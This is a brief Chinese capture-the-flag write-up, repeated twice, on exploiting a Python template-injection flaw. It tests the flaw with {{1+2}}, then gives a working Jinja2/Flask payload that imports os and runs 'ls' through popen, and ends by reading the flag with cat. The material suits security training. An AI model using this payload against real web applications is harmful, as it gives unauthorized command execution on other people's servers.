打开环境,python的模板注入
先测试一下
{{1+2}}
执行命令
{{g.pop.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
找到一个像极了存放flag的地方 cat看一下
ok拿到
打开环境,python的模板注入
先测试一下
{{1+2}}
执行命令
{{g.pop.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
找到一个像极了存放flag的地方 cat看一下
ok拿到